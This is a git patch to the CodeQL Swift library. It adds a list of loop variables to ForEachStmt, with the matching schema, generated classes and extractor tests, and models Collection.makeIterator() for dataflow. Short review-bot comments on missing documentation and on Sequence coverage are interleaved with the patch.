@@ -1232,7 +1232,12 @@ test/extractor-tests/generated/stmt/DoCatchStmt/MISSING_SOURCE.txt 35fb32ea53931 test/extractor-tests/generated/stmt/DoStmt/MISSING_SOURCE.txt 35fb32ea5393152eb7a875b20b4e3e4b8c7a997a8959c32417140d57a16a052d 35fb32ea5393152eb7a875b20b4e3e4b8c7a997a8959c32417140d57a16a052d test/extractor-tests/generated/stmt/FailStmt/FailStmt.ql db2d21fe1b01949180ff11416f2dc0a6a561f9ac9e6a5654156f947c584971de 2cf787b54819077dd2b4da870b722396ebf953e05bf0b1c393affef2b1fe11ba test/extractor-tests/generated/stmt/FallthroughStmt/MISSING_SOURCE.txt 35fb32ea5393152eb7a875b20b4e3e4b8c7a997a8959c32417140d57a16a052d 35fb32ea5393152eb7a875b20b4e3e4b8c7a997a8959c32417140d57a16a052d -test/extractor-tests/generated/stmt/ForEachStmt/MISSING_SOURCE.txt 35fb32ea5393152eb7a875b20b4e3e4b8c7a997a8959c32417140d57a16a052d 35fb32ea5393152eb7a875b20b4e3e4b8c7a997a8959c32417140d57a16a052d +test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt.ql 093a6619940636974e2a59f085937f9fa8645a134199c130ee99babfd2c1f1a0 068daffb2da1be9135eb818190926af3958d503c3c61de2659c0c0e167b2d11c +test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getIteratorVar.ql 1b8689dda5defd45c8bb743b30d723ed7b0c80ca54b81fb0f5fcf76620ec4ef4 1e48e40cff37194e0ea2b69997177237145fa1070e84c8f701a03d71416652b5 +test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getLabel.ql 1cf0663cd16886d4361bedad93759ab84fcaf54d5fbf16d7d2f4108f74c38683 129778f5f36d10e8a10452f333304fef9b95919cfe367ce6ff7309e2d3f3ab3b +test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getNextCall.ql 503106f20025ec479ffe46daf13ff80f5d824b657c43da8185ae2d74af8740a3 551e33f70028268e3b3790c17907101be768c42811b62978ed10ffc0a65e25d0 +test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getVariable.ql 749149b5164f493bb49726e1d54cdd1c85607566c0ba7adfc3514ea953b1f40e 1695a631aeeb47e6a0d22ec18d713f1fe2f730684269fc6e50c70020a78fbf3c +test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getWhere.ql 
536af56264054a7af626a5ca4bb5bcc5b8f13299d11c499a110e4f12e2c166b6 bfd8b355342b0a03ced022b31d39e9adc6d7820a28394315392a9e2fc7647555 test/extractor-tests/generated/stmt/GuardStmt/MISSING_SOURCE.txt 35fb32ea5393152eb7a875b20b4e3e4b8c7a997a8959c32417140d57a16a052d 35fb32ea5393152eb7a875b20b4e3e4b8c7a997a8959c32417140d57a16a052d test/extractor-tests/generated/stmt/IfStmt/MISSING_SOURCE.txt 35fb32ea5393152eb7a875b20b4e3e4b8c7a997a8959c32417140d57a16a052d 35fb32ea5393152eb7a875b20b4e3e4b8c7a997a8959c32417140d57a16a052d test/extractor-tests/generated/stmt/PoundAssertStmt/PoundAssertStmt.ql 46b702865ef1dc4d9d8332a3d68ba295a1f8ce9737dbcb07a5ef4c701c021789 07eaec1abc763a4f2339466fd0f06d12c4ca21d9eeb21ab1f7366916dafc4854 diff --git a/swift/ql/.gitattributes b/swift/ql/.gitattributes index 43efa50e93d..ab478ec526b 100644 --- a/swift/ql/.gitattributes +++ b/swift/ql/.gitattributes 
@@ -1234,7 +1234,12 @@ /test/extractor-tests/generated/stmt/DoStmt/MISSING_SOURCE.txt linguist-generated /test/extractor-tests/generated/stmt/FailStmt/FailStmt.ql linguist-generated /test/extractor-tests/generated/stmt/FallthroughStmt/MISSING_SOURCE.txt linguist-generated -/test/extractor-tests/generated/stmt/ForEachStmt/MISSING_SOURCE.txt linguist-generated +/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt.ql linguist-generated +/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getIteratorVar.ql linguist-generated +/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getLabel.ql linguist-generated +/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getNextCall.ql linguist-generated +/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getVariable.ql linguist-generated +/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getWhere.ql linguist-generated /test/extractor-tests/generated/stmt/GuardStmt/MISSING_SOURCE.txt linguist-generated /test/extractor-tests/generated/stmt/IfStmt/MISSING_SOURCE.txt linguist-generated /test/extractor-tests/generated/stmt/PoundAssertStmt/PoundAssertStmt.ql linguist-generated diff --git a/swift/ql/lib/codeql/swift/elements/stmt/ForEachStmt.qll b/swift/ql/lib/codeql/swift/elements/stmt/ForEachStmt.qll index 8777a189af1..84f08865dd0 100644 --- a/swift/ql/lib/codeql/swift/elements/stmt/ForEachStmt.qll +++ b/swift/ql/lib/codeql/swift/elements/stmt/ForEachStmt.qll @@ -9,5 +9,6 @@ import codeql.swift.elements.expr.Expr import codeql.swift.elements.stmt.LabeledStmt import codeql.swift.elements.pattern.Pattern import codeql.swift.elements.decl.PatternBindingDecl +import codeql.swift.elements.decl.VarDecl final class ForEachStmt = Impl::ForEachStmt; diff --git a/swift/ql/lib/codeql/swift/generated/ParentChild.qll b/swift/ql/lib/codeql/swift/generated/ParentChild.qll index 868d2d6b350..8f2d6fb5357 100644 --- a/swift/ql/lib/codeql/swift/generated/ParentChild.qll 
+++ b/swift/ql/lib/codeql/swift/generated/ParentChild.qll @@ -3873,14 +3873,15 @@ private module Impl { ForEachStmt e, int index, string partialPredicateCall ) { exists( - int b, int bLabeledStmt, int n, int nPattern, int nWhere, int nIteratorVar, int nNextCall, - int nBody + int b, int bLabeledStmt, int n, int nVariable, int nPattern, int nWhere, int nIteratorVar, + int nNextCall, int nBody | b = 0 and bLabeledStmt = b + 1 + max(int i | i = -1 or exists(getImmediateChildOfLabeledStmt(e, i, _)) | i) and n = bLabeledStmt and - nPattern = n + 1 and + nVariable = n + 1 + max(int i | i = -1 or exists(e.getVariable(i)) | i) and + nPattern = nVariable + 1 and nWhere = nPattern + 1 and nIteratorVar = nWhere + 1 and nNextCall = nIteratorVar + 1 and @@ -3890,7 +3891,12 @@ private module Impl { or result = getImmediateChildOfLabeledStmt(e, index - b, partialPredicateCall) or - index = n and result = e.getImmediatePattern() and partialPredicateCall = "Pattern()" + result = e.getVariable(index - n) and + partialPredicateCall = "Variable(" + (index - n).toString() + ")" + or + index = nVariable and + result = e.getImmediatePattern() and + partialPredicateCall = "Pattern()" or index = nPattern and result = e.getImmediateWhere() and partialPredicateCall = "Where()" or diff --git a/swift/ql/lib/codeql/swift/generated/Raw.qll b/swift/ql/lib/codeql/swift/generated/Raw.qll index 69b72a2b06b..820dd7e3a88 100644 --- a/swift/ql/lib/codeql/swift/generated/Raw.qll +++ b/swift/ql/lib/codeql/swift/generated/Raw.qll @@ -3003,6 +3003,11 @@ module Raw { class ForEachStmt extends @for_each_stmt, LabeledStmt { override string toString() { result = "ForEachStmt" } + /** + * Gets the `index`th variable of this for each statement (0-based). + */ + VarDecl getVariable(int index) { for_each_stmt_variables(this, index, result) } + /** * Gets the pattern of this for each statement. */ 
diff --git a/swift/ql/lib/codeql/swift/generated/stmt/ForEachStmt.qll b/swift/ql/lib/codeql/swift/generated/stmt/ForEachStmt.qll index 9adc411cf6a..4b156f582f9 100644 --- a/swift/ql/lib/codeql/swift/generated/stmt/ForEachStmt.qll +++ b/swift/ql/lib/codeql/swift/generated/stmt/ForEachStmt.qll @@ -11,6 +11,7 @@ import codeql.swift.elements.expr.Expr import codeql.swift.elements.stmt.internal.LabeledStmtImpl::Impl as LabeledStmtImpl import codeql.swift.elements.pattern.Pattern import codeql.swift.elements.decl.PatternBindingDecl +import codeql.swift.elements.decl.VarDecl /** * INTERNAL: This module contains the fully generated definition of `ForEachStmt` and should not @@ -24,6 +25,26 @@ module Generated { class ForEachStmt extends Synth::TForEachStmt, LabeledStmtImpl::LabeledStmt { override string getAPrimaryQlClass() { result = "ForEachStmt" } + /** + * Gets the `index`th variable of this for each statement (0-based). + */ + VarDecl getVariable(int index) { + result = + Synth::convertVarDeclFromRaw(Synth::convertForEachStmtToRaw(this) + .(Raw::ForEachStmt) + .getVariable(index)) + } + + /** + * Gets any of the variables of this for each statement. + */ + final VarDecl getAVariable() { result = this.getVariable(_) } + + /** + * Gets the number of variables of this for each statement. + */ + final int getNumberOfVariables() { result = count(int i | exists(this.getVariable(i))) } + /** * Gets the pattern of this for each statement. * diff --git a/swift/ql/lib/swift.dbscheme b/swift/ql/lib/swift.dbscheme index 44c4818a898..33db81ad4b6 100644 --- a/swift/ql/lib/swift.dbscheme +++ b/swift/ql/lib/swift.dbscheme @@ -2019,6 +2019,13 @@ for_each_stmts( //dir=stmt int body: @brace_stmt_or_none ref ); +#keyset[id, index] +for_each_stmt_variables( //dir=stmt + int id: @for_each_stmt ref, + int index: int ref, + int variable: @var_decl_or_none ref +); + #keyset[id] for_each_stmt_wheres( //dir=stmt int id: @for_each_stmt ref, 
diff --git a/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt.expected b/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt.expected new file mode 100644 index 00000000000..2fd2e5d318e --- /dev/null +++ b/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt.expected @@ -0,0 +1,3 @@ +| for.swift:4:5:6:5 | for ... in ... where ... { ... } | hasLabel: | no | getNumberOfVariables: | 2 | getPattern: | for.swift:4:9:4:9 | x | hasWhere: | yes | hasIteratorVar: | yes | hasNextCall: | yes | getBody: | for.swift:4:32:6:5 | { ... } | +| for.swift:7:5:9:5 | for ... in ... { ... } | hasLabel: | no | getNumberOfVariables: | 2 | getPattern: | for.swift:7:9:7:9 | s | hasWhere: | no | hasIteratorVar: | yes | hasNextCall: | yes | getBody: | for.swift:7:23:9:5 | { ... } | +| for.swift:13:5:17:5 | for ... in ... { ... } | hasLabel: | no | getNumberOfVariables: | 1 | getPattern: | for.swift:13:9:13:9 | x | hasWhere: | no | hasIteratorVar: | no | hasNextCall: | no | getBody: | for.swift:13:32:17:5 | { ... } | diff --git a/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt.ql b/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt.ql new file mode 100644 index 00000000000..bb659c7855a --- /dev/null +++ b/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt.ql 
@@ -0,0 +1,20 @@ +// generated by codegen/codegen.py, do not edit +import codeql.swift.elements +import TestUtils + +from + ForEachStmt x, string hasLabel, int getNumberOfVariables, Pattern getPattern, string hasWhere, + string hasIteratorVar, string hasNextCall, BraceStmt getBody +where + toBeTested(x) and + not x.isUnknown() and + (if x.hasLabel() then hasLabel = "yes" else hasLabel = "no") and + getNumberOfVariables = x.getNumberOfVariables() and + getPattern = x.getPattern() and + (if x.hasWhere() then hasWhere = "yes" else hasWhere = "no") and + (if x.hasIteratorVar() then hasIteratorVar = "yes" else hasIteratorVar = "no") and + (if x.hasNextCall() then hasNextCall = "yes" else hasNextCall = "no") and + getBody = x.getBody() +select x, "hasLabel:", hasLabel, "getNumberOfVariables:", getNumberOfVariables, "getPattern:", + getPattern, "hasWhere:", hasWhere, "hasIteratorVar:", hasIteratorVar, "hasNextCall:", hasNextCall, + "getBody:", getBody diff --git a/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getIteratorVar.expected b/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getIteratorVar.expected new file mode 100644 index 00000000000..72e969cbaa4 --- /dev/null +++ b/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getIteratorVar.expected @@ -0,0 +1,2 @@ +| for.swift:4:5:6:5 | for ... in ... where ... { ... } | file://:0:0:0:0 | var ... = ... | +| for.swift:7:5:9:5 | for ... in ... { ... } | file://:0:0:0:0 | var ... = ... | diff --git a/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getIteratorVar.ql b/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getIteratorVar.ql new file mode 100644 index 00000000000..76c004d4e56 --- /dev/null +++ b/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getIteratorVar.ql 
@@ -0,0 +1,7 @@ +// generated by codegen/codegen.py, do not edit +import codeql.swift.elements +import TestUtils + +from ForEachStmt x +where toBeTested(x) and not x.isUnknown() +select x, x.getIteratorVar() diff --git a/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getLabel.expected b/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getLabel.expected new file mode 100644 index 00000000000..e69de29bb2d diff --git a/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getLabel.ql b/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getLabel.ql new file mode 100644 index 00000000000..218668c2e28 --- /dev/null +++ b/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getLabel.ql @@ -0,0 +1,7 @@ +// generated by codegen/codegen.py, do not edit +import codeql.swift.elements +import TestUtils + +from ForEachStmt x +where toBeTested(x) and not x.isUnknown() +select x, x.getLabel() diff --git a/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getNextCall.expected b/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getNextCall.expected new file mode 100644 index 00000000000..191a8f2196b --- /dev/null +++ b/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getNextCall.expected @@ -0,0 +1,2 @@ +| for.swift:4:5:6:5 | for ... in ... where ... { ... } | for.swift:4:5:4:5 | call to next() | +| for.swift:7:5:9:5 | for ... in ... { ... } | for.swift:7:5:7:5 | call to next() | diff --git a/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getNextCall.ql b/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getNextCall.ql new file mode 100644 index 00000000000..1b52342b92c --- /dev/null +++ b/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getNextCall.ql 
@@ -0,0 +1,7 @@ +// generated by codegen/codegen.py, do not edit +import codeql.swift.elements +import TestUtils + +from ForEachStmt x +where toBeTested(x) and not x.isUnknown() +select x, x.getNextCall() diff --git a/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getVariable.expected b/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getVariable.expected new file mode 100644 index 00000000000..9762122d43d --- /dev/null +++ b/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getVariable.expected @@ -0,0 +1,5 @@ +| for.swift:4:5:6:5 | for ... in ... where ... { ... } | 0 | for.swift:4:9:4:9 | x | +| for.swift:4:5:6:5 | for ... in ... where ... { ... } | 1 | for.swift:4:14:4:14 | $x$generator | +| for.swift:7:5:9:5 | for ... in ... { ... } | 0 | for.swift:7:9:7:9 | s | +| for.swift:7:5:9:5 | for ... in ... { ... } | 1 | for.swift:7:14:7:14 | $s$generator | +| for.swift:13:5:17:5 | for ... in ... { ... } | 0 | for.swift:13:9:13:9 | x | diff --git a/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getVariable.ql b/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getVariable.ql new file mode 100644 index 00000000000..9981a03570a --- /dev/null +++ b/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getVariable.ql @@ -0,0 +1,7 @@ +// generated by codegen/codegen.py, do not edit +import codeql.swift.elements +import TestUtils + +from ForEachStmt x, int index +where toBeTested(x) and not x.isUnknown() +select x, index, x.getVariable(index) diff --git a/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getWhere.expected b/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getWhere.expected new file mode 100644 index 00000000000..991ace80dd3 --- /dev/null +++ b/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getWhere.expected 
@@ -0,0 +1 @@ +| for.swift:4:5:6:5 | for ... in ... where ... { ... } | for.swift:4:25:4:30 | ... .!=(_:_:) ... | diff --git a/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getWhere.ql b/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getWhere.ql new file mode 100644 index 00000000000..176846c278c --- /dev/null +++ b/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getWhere.ql @@ -0,0 +1,7 @@ +// generated by codegen/codegen.py, do not edit +import codeql.swift.elements +import TestUtils + +from ForEachStmt x +where toBeTested(x) and not x.isUnknown() +select x, x.getWhere() diff --git a/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/MISSING_SOURCE.txt b/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/MISSING_SOURCE.txt deleted file mode 100644 index bdba87873f2..00000000000 --- a/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/MISSING_SOURCE.txt +++ /dev/null @@ -1,4 +0,0 @@ -// generated by codegen/codegen.py, do not edit - -After a source file is added in this directory and codegen/codegen.py is run again, test queries -will appear and this file will be deleted diff --git a/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/for.swift b/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/for.swift new file mode 100644 index 00000000000..fbe80e3ae63 --- /dev/null +++ b/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/for.swift @@ -0,0 +1,19 @@ +struct S {} + +func test_sequence(_ ints: [Int], _ elements: [S]) { + for x in ints where x != 0 { + print(x) + } + for s in elements { + print(s) + } +} + +func test_variadic_pack(_ array: repeat [each T]) -> Bool { + for x in repeat each array { + if !x.isEmpty { + return false + } + } + return true +} diff --git a/swift/ql/test/library-tests/elements/expr/methodlookup/PrintAst.expected b/swift/ql/test/library-tests/elements/expr/methodlookup/PrintAst.expected index d511a390341..f0d85be52b6 100644 
--- a/swift/ql/test/library-tests/elements/expr/methodlookup/PrintAst.expected +++ b/swift/ql/test/library-tests/elements/expr/methodlookup/PrintAst.expected @@ -187,6 +187,7 @@ methodlookup.swift: # 40| getBase(): [TypeExpr] Bar.Type # 40| getTypeRepr(): [TypeRepr] Bar # 40| getMethodRef(): [DeclRefExpr] staticMethod() +# 33| getExpr().getFullyConverted(): [FunctionConversionExpr] (@isolated(any) () async -> ()) ... # 33| [NilLiteralExpr] nil # 38| [Comment] // Bar.instanceMethod(bar2)() // error: actor-isolated instance method 'instanceMethod()' can not be referenced from a non-isolated context # 38| @@ -262,6 +263,7 @@ methodlookup.swift: # 51| getMethodRef(): [DeclRefExpr] staticMethod() # 51| getMethodRef().getFullyConverted(): [FunctionConversionExpr] ((Baz.Type) -> @MainActor () -> ()) ... # 51| getElement(5).getFullyConverted(): [AwaitExpr] await ... +# 43| getExpr().getFullyConverted(): [FunctionConversionExpr] (@isolated(any) () async -> ()) ... # 43| [NilLiteralExpr] nil # 47| [Comment] // DotSyntaxCallExpr # 47| diff --git a/swift/schema.py b/swift/schema.py index e1deb0a2778..7c2cebb594d 100644 --- a/swift/schema.py +++ b/swift/schema.py @@ -1016,6 +1016,7 @@ class DoStmt(LabeledStmt): body: BraceStmt | child class ForEachStmt(LabeledStmt): + variables: list[VarDecl] | child pattern: Pattern | child where: optional[Expr] | child iteratorVar: optional[PatternBindingDecl] | child From 1d43abfe4dcbae9bff7f575be777c872acb83146 Mon Sep 17 00:00:00 2001 
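Review bot: The new `variables` field on `ForEachStmt` carries no comment saying what it holds, and the generated test output suggests it is more than the pattern-bound names. `ForEachStmt_getVariable.expected` lists `$x$generator` at index 1 for the two array loops but only `x` for the `repeat each` loop. A one-line comment above the field, e.g. `# variables declared by the loop, including the (apparently synthesized) $<name>$generator iterator variable where one exists`, would stop query authors assuming `getAVariable()` returns only user-written bindings. The field is also declared before `pattern`, which moves the existing children to later indices in the generated `ParentChild.qll`, so it is worth confirming nothing relies on the old positions. The class body continues past the end of the hunk.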
From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Thu, 28 Nov 2024 10:07:44 +0000 Subject: [PATCH 0755/1267] Swift: Model Collection.makeIterator(). --- .../frameworks/StandardLibrary/Collection.qll | 1 + .../dataflow/dataflow/DataFlow.expected | 39 +++++++++++++++++++ .../dataflow/dataflow/test.swift | 2 +- .../dataflow/dataflow/test2.swift | 4 +- .../CWE-020/MissingRegexAnchor.expected | 3 ++ .../Security/CWE-020/UnanchoredUrlRegex.swift | 6 +-- 6 files changed, 49 insertions(+), 6 deletions(-)
diff --git a/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Collection.qll b/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Collection.qll
index 967eeec1432..5222b587d1e 100644
--- a/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Collection.qll
+++ b/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Collection.qll
@@ -44,6 +44,7 @@ private class CollectionSummaries extends SummaryModelCsv {
 ";Collection;true;trimmingPrefix(_:);;;Argument[-1].CollectionElement;ReturnValue.CollectionElement;value",
 ";Collection;true;trimmingPrefix(while:);;;Argument[-1];ReturnValue;taint",
 ";Collection;true;trimmingPrefix(while:);;;Argument[-1].CollectionElement;ReturnValue.CollectionElement;value",
+ ";Collection;true;makeIterator();;;Argument[-1].CollectionElement;ReturnValue.CollectionElement;value",
 ";RangeReplaceableCollection;true;init(_:);;;Argument[0];ReturnValue.CollectionElement;taint",
 ";RangeReplaceableCollection;true;init(_:);;;Argument[0].CollectionElement;ReturnValue.CollectionElement;value",
 ";RangeReplaceableCollection;true;init(repeating:count:);;;Argument[0];ReturnValue.CollectionElement;value",
diff --git a/swift/ql/test/library-tests/dataflow/dataflow/DataFlow.expected b/swift/ql/test/library-tests/dataflow/dataflow/DataFlow.expected
index 6214054c9fe..bf6376bb0a1 100644
--- a/swift/ql/test/library-tests/dataflow/dataflow/DataFlow.expected
+++ b/swift/ql/test/library-tests/dataflow/dataflow/DataFlow.expected
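Review bot: The added `makeIterator()` row in `CollectionSummaries` is keyed on `Collection`, but in Swift `makeIterator()` is a requirement of `Sequence`. A `for`-`in` loop over a type that conforms only to `Sequence` would presumably still drop element flow at the iterator call, unless a summary elsewhere already covers it. The tests updated in this commit loop only over arrays and a variadic parameter, so that case is not exercised. If the summary format accepts it, a parallel row such as `";Sequence;true;makeIterator();;;Argument[-1].CollectionElement;ReturnValue.CollectionElement;value",` plus a test over a custom `Sequence` would close the gap. The new row also carries element content only, whereas the neighbouring `trimmingPrefix(while:)` pair has an `Argument[-1];ReturnValue;taint` row as well, so a collection that is tainted as a whole may need the same pairing. The class body starts and ends outside the hunk.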
@@ -135,9 +135,15 @@ edges | test2.swift:69:10:69:10 | key | test2.swift:70:19:70:19 | key | provenance | | | test2.swift:69:25:69:25 | call to makeIterator() [Collection element, Tuple element at index 0] | test2.swift:69:5:69:5 | $generator [Collection element, Tuple element at index 0] | provenance | | | test2.swift:69:25:69:25 | d4 [Collection element, Tuple element at index 0] | test2.swift:69:25:69:25 | call to makeIterator() [Collection element, Tuple element at index 0] | provenance | | +| test2.swift:76:14:76:47 | [...] [Collection element] | test2.swift:78:14:78:14 | a1 [Collection element] | provenance | | | test2.swift:76:14:76:47 | [...] [Collection element] | test2.swift:82:19:82:19 | a1 [Collection element] | provenance | | | test2.swift:76:14:76:47 | [...] [Collection element] | test2.swift:84:20:84:20 | a1 [Collection element] | provenance | | | test2.swift:76:30:76:46 | call to source(_:) | test2.swift:76:14:76:47 | [...] [Collection element] | provenance | | +| test2.swift:78:5:78:5 | $v$generator [Collection element] | test2.swift:78:5:78:5 | call to next() [some:0] | provenance | | +| test2.swift:78:5:78:5 | call to next() [some:0] | test2.swift:78:9:78:9 | v | provenance | | +| test2.swift:78:9:78:9 | v | test2.swift:79:19:79:19 | v | provenance | | +| test2.swift:78:14:78:14 | a1 [Collection element] | test2.swift:78:14:78:14 | call to makeIterator() [Collection element] | provenance | | +| test2.swift:78:14:78:14 | call to makeIterator() [Collection element] | test2.swift:78:5:78:5 | $v$generator [Collection element] | provenance | | | test2.swift:82:19:82:19 | a1 [Collection element] | test2.swift:82:19:82:24 | ...[...] | provenance | | | test2.swift:84:5:84:5 | $generator [Collection element, Tuple element at index 1] | test2.swift:84:5:84:5 | call to next() [some:0, Tuple element at index 1] | provenance | | | test2.swift:84:5:84:5 | call to next() [some:0, Tuple element at index 1] | test2.swift:84:9:84:15 | (...) 
[Tuple element at index 1] | provenance | | 
@@ -146,9 +152,15 @@ edges | test2.swift:84:20:84:20 | a1 [Collection element] | test2.swift:84:20:84:34 | call to enumerated() [Collection element, Tuple element at index 1] | provenance | | | test2.swift:84:20:84:34 | call to enumerated() [Collection element, Tuple element at index 1] | test2.swift:84:20:84:34 | call to makeIterator() [Collection element, Tuple element at index 1] | provenance | | | test2.swift:84:20:84:34 | call to makeIterator() [Collection element, Tuple element at index 1] | test2.swift:84:5:84:5 | $generator [Collection element, Tuple element at index 1] | provenance | | +| test2.swift:93:5:93:5 | [post] a2 [Collection element] | test2.swift:95:14:95:14 | a2 [Collection element] | provenance | | | test2.swift:93:5:93:5 | [post] a2 [Collection element] | test2.swift:99:19:99:19 | a2 [Collection element] | provenance | | | test2.swift:93:5:93:5 | [post] a2 [Collection element] | test2.swift:101:20:101:20 | a2 [Collection element] | provenance | | | test2.swift:93:13:93:29 | call to source(_:) | test2.swift:93:5:93:5 | [post] a2 [Collection element] | provenance | | +| test2.swift:95:5:95:5 | $v$generator [Collection element] | test2.swift:95:5:95:5 | call to next() [some:0] | provenance | | +| test2.swift:95:5:95:5 | call to next() [some:0] | test2.swift:95:9:95:9 | v | provenance | | +| test2.swift:95:9:95:9 | v | test2.swift:96:19:96:19 | v | provenance | | +| test2.swift:95:14:95:14 | a2 [Collection element] | test2.swift:95:14:95:14 | call to makeIterator() [Collection element] | provenance | | +| test2.swift:95:14:95:14 | call to makeIterator() [Collection element] | test2.swift:95:5:95:5 | $v$generator [Collection element] | provenance | | | test2.swift:99:19:99:19 | a2 [Collection element] | test2.swift:99:19:99:24 | ...[...] 
| provenance | | | test2.swift:101:5:101:5 | $generator [Collection element, Tuple element at index 1] | test2.swift:101:5:101:5 | call to next() [some:0, Tuple element at index 1] | provenance | | | test2.swift:101:5:101:5 | call to next() [some:0, Tuple element at index 1] | test2.swift:101:9:101:15 | (...) [Tuple element at index 1] | provenance | | 
@@ -712,9 +724,15 @@ edges | test.swift:849:19:849:24 | v | test.swift:850:15:850:15 | v | provenance | | | test.swift:856:29:856:40 | args [Collection element] | test.swift:859:15:859:15 | args [Collection element] | provenance | | | test.swift:856:29:856:40 | args [Collection element] | test.swift:860:15:860:15 | args [Collection element] | provenance | | +| test.swift:856:29:856:40 | args [Collection element] | test.swift:862:16:862:16 | args [Collection element] | provenance | | | test.swift:856:29:856:40 | args [Collection element] | test.swift:867:15:867:15 | args [Collection element] | provenance | | | test.swift:859:15:859:15 | args [Collection element] | test.swift:859:15:859:21 | ...[...] | provenance | | | test.swift:860:15:860:15 | args [Collection element] | test.swift:860:15:860:21 | ...[...] | provenance | | +| test.swift:862:5:862:5 | $arg$generator [Collection element] | test.swift:862:5:862:5 | call to next() [some:0] | provenance | | +| test.swift:862:5:862:5 | call to next() [some:0] | test.swift:862:9:862:9 | arg | provenance | | +| test.swift:862:9:862:9 | arg | test.swift:863:19:863:19 | arg | provenance | | +| test.swift:862:16:862:16 | args [Collection element] | test.swift:862:16:862:16 | call to makeIterator() [Collection element] | provenance | | +| test.swift:862:16:862:16 | call to makeIterator() [Collection element] | test.swift:862:5:862:5 | $arg$generator [Collection element] | provenance | | | test.swift:866:21:866:29 | enter #keyPath(...) [Collection element] | test.swift:866:27:866:29 | KeyPathComponent | provenance | | | test.swift:866:27:866:29 | KeyPathComponent | test.swift:866:21:866:29 | exit #keyPath(...) | provenance | | | test.swift:867:15:867:15 | args [Collection element] | test.swift:866:21:866:29 | enter #keyPath(...) [Collection element] | provenance | | 
@@ -908,6 +926,12 @@ nodes | test2.swift:70:19:70:19 | key | semmle.label | key | | test2.swift:76:14:76:47 | [...] [Collection element] | semmle.label | [...] [Collection element] | | test2.swift:76:30:76:46 | call to source(_:) | semmle.label | call to source(_:) | +| test2.swift:78:5:78:5 | $v$generator [Collection element] | semmle.label | $v$generator [Collection element] | +| test2.swift:78:5:78:5 | call to next() [some:0] | semmle.label | call to next() [some:0] | +| test2.swift:78:9:78:9 | v | semmle.label | v | +| test2.swift:78:14:78:14 | a1 [Collection element] | semmle.label | a1 [Collection element] | +| test2.swift:78:14:78:14 | call to makeIterator() [Collection element] | semmle.label | call to makeIterator() [Collection element] | +| test2.swift:79:19:79:19 | v | semmle.label | v | | test2.swift:82:19:82:19 | a1 [Collection element] | semmle.label | a1 [Collection element] | | test2.swift:82:19:82:24 | ...[...] | semmle.label | ...[...] | | test2.swift:84:5:84:5 | $generator [Collection element, Tuple element at index 1] | semmle.label | $generator [Collection element, Tuple element at index 1] | 
